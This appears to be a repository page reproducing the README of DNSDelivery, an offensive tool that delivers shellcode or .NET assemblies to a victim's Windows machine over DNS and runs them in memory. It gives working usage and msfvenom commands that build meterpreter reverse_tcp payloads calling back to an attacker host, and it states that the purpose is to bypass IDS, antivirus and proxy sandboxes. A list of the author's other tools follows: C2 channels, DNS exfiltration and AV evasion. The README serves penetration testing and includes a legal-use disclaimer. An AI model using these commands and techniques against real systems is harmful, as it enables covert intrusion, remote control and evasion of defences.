• Stars
    star
    148
  • Rank 249,983 (Top 5 %)
  • Language
    PowerShell
  • Created almost 8 years ago
  • Updated about 5 years ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

DNSDelivery provides delivery and in memory execution of shellcode or .Net assembly using DNS requests delivery channel.

DNS Delivery

Author: Arno0x0x - @Arno0x0x

DNSDelivery provides delivery and in memory execution of shellcode or .Net assembly using DNS requests delivery channel.

DNSDelivery has to sides:

  1. The server side, coming as a single python script (dnsdelivery.py), which acts as a custom DNS server, serving the payload data
  2. The client side (victim's side), which comes in two flavors: - dnsdelivery.cs: a C# script that can be compiled with csc.exe to provide a Windows managed executable - Invoke-DNSDelivery.ps1: a PowerShell script providing the exact same functionnalities

In order for the whole thing to work you need to own your domain name and set the DNS record for that domain to point to the server that will run the dnsdelivery.py server side. For local testing purposes though, you can configure the client side scripts to point to any DNS server.

Dependencies

The only dependency is on the server side, as the dnsdelivery.py script relies on the external dnslib library. You can installing it using pip:

pip install dnslib

Configuration

The only mandatory configurable parameter on the client side is the DNS domain name you want to use (the one you're running the DNS server side on). An optionnal configurable parameter is the DNS server you want to use. By default, it will use the system's default DNS server.

  • For the C# script, you need to edit the script and set the parameters in the PARAM class, comments and variable names are pretty self-explanatory. Then compile it using the built-in C# compiler csc.exe: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:dnsdelivery.exe *.cs

  • For the PowerShell script, you can simply pass the parameters as arguments. Once the module is loaded into powershell simply check the syntax with Get-Help Invoke-DNSDelivery

Usage

SERVER SIDE

Call the `dnsdelivery.py script with the appropriate parameters:

  • The type of content being delivered: can be either shellcode or assembly
  • The filename which is the name (or path) of the file being delivered

If a shellcode type is to be delivered, it must be a raw type shellcode obtained, for instance, from metasploit:

root@kali:~# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.52.130 LPORT=4444 -f raw > myShellcodeFile.raw

Example of delivering a shellcode:

root@kali:~# ./dnsdelivery.py shellcode myShellcodeFile.raw
[*] File [myShellcodeFile.raw] successfully loaded
[*] Data split into [5] chunks of 250 bytes
[*] DNS server listening on port 53
[*] Serving [myShellcodeFile.raw] advertised as a [shellcode] data type

Example of delivering a .Net assembly:

root@kali:~# ./dnsdelivery.py assembly peloader.exe
[*] File [peloader.exe] successfully loaded
[*] Data split into [1058] chunks of 250 bytes
[*] DNS server listening on port 53
[*] Serving [peloader.exe] advertised as a [assembly] data type

CLIENT SIDE

If using the C# compiled Windows executable: simply execute it, the parameters are hardcoded within the script.

If using the PowerShell script, well, call it in any of your prefered way (you probably know tons of ways of invoking a powershell script) along with the script parameters. Most basic example:

c:\DNSDelivery> powershell
PS c:\DNSDelivery> Import-Module .\Invoke-DNSDelivery.ps1
PS c:\DNSDelivery> Invoke-DNSDelivery -DomainName mydomain.example.com -Verbose
[...]

Sample use cases

I found this delivery method very useful and handy for delivering:

  • any meterpreter shellcode
  • full-fledged meterpreter executable (standalone meterpreter executable, not staged)
  • any .Net assembly you can think of

while completely bypassing perimeter security (IDS, content analysis like AV and sandboxes on proxies, etc.).

Example of delivering a full-fledged meterpreter executable:

First create a non-staged meterpreter executable:

root@kali:~# msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.52.130 LPORT=4444 -f exe-only > meterpreter.exe

Second, encode this executable to a base64 string:

root@kali:~# cat meterpreter.exe | base64 -w 0 > meterpreter.b64

Third paste the base64 string (yes, it can be huge, around 3MB) into the peLoader.cs (thx @SubTee) available here peloader.cs and compile this into a Windows executable (which by the way IS a .Net assembly).

Eventually, serve it with DNSDelivery:

root@kali:~# ./dnsdelivery.py assembly meterpreter_peloader.exe

It can be long because the data is delivered over DNS, chunk by chunk (250 bytes per chunk), but who cares if it takes 10 minutes and you eventually get you full-fledged meterpreter executable loaded into memory and executed on the victim's machine :-)

DISCLAIMER

This tool is intended to be used in a legal and legitimate way only:

  • either on your own systems as a means of learning, of demonstrating what can be done and how, or testing your defense and detection mechanisms
  • on systems you've been officially and legitimately entitled to perform some security assessments (pentest, security audits)

Quoting Empire's authors: There is no way to build offensive tools useful to the legitimate infosec industry while simultaneously preventing malicious actors from abusing them.

More Repositories

1

DNSExfiltrator

Data exfiltration over DNS request covert channel
JavaScript
802
star
2

EmbedInHTML

Embed and hide any file in an HTML file
HTML
462
star
3

PowerShellScripts

Collection of PowerShell scripts
PowerShell
434
star
4

ShellcodeWrapper

Shellcode wrapper with encryption for multiple target languages
Python
410
star
5

WSC2

A WebSocket C2 Tool
Python
366
star
6

CSharpScripts

Collection of C# scripts
C#
326
star
7

NtlmRelayToEWS

ntlm relay attack to Exchange Web Services
Python
325
star
8

DivertTCPconn

A TCP packet diverter for Windows platform
C
275
star
9

DBC2

DBC2 (DropboxC2) is a modular post-exploitation tool, composed of an agent running on the victim's machine, a controler, running on any machine, powershell modules, and Dropbox servers as a means of communication.
PowerShell
269
star
10

TwoFactorAuth

Two Factor Authentication web portal written in PHP
PHP
119
star
11

TCPRelayInjecter

Tool for injecting a "TCP Relay" managed assembly into unmanaged processes
C++
119
star
12

WebDavC2

A WebDAV PROPFIND C2 tool
Python
116
star
13

ObfuscateCactusTorch

When CactusTorch meets WebDavDelivery and obfuscation
Python
64
star
14

TCPRelayInjecter2

Tool for injecting a "TCP Relay" managed assembly into an unmanaged process
C#
62
star
15

ReflectiveDnsExfiltrator

Data exfiltration using reflective DNS resolution covert channel
JavaScript
54
star
16

WebDavDelivery

A WebDAV PROPFIND covert channel to deliver payloads
Visual Basic
53
star
17

TermGate

A web application for running shell commands interactively on your server
PHP
21
star
18

BluecoatURLFilteringBypass

Bluecoat proxies URL filtering bypass PoC
JavaScript
14
star
19

MOBACMapsSources

Mobile Atlas Creator Additionnal map sources
11
star
20

NmapScripts

Collection of Nmap scripts
Lua
11
star
21

MultibyteEncodedShellcode

An AV evasion technique using multibyte xor encoding of shellcode
9
star
22

Docker-Dnscat2

Dockerfile and ressources for Dnscat2
Shell
8
star
23

GimmeTheFile

Proof of concept for bypassing corporate web proxies filtering and antiviruses
PHP
8
star
24

DeliverXLLviaHTML

Deliver encrypted XLL embeded in HTML file
7
star
25

Docker-Socator

Dockerfile and ressources for Socat + Tor
Shell
7
star
26

ShellScripts

Collection of shell scripts
Shell
6
star
27

HttpProxy

A simple HttpProxy for NodeJS
JavaScript
6
star
28

Docker-Cryptpad

Dockerfile and ressources for CryptPad application
JavaScript
5
star
29

Docker-DBC2

Dockerfile and ressources for DBC2
1
star
30

Docker-Koadic

Dockerfile and ressources for Koadic
1
star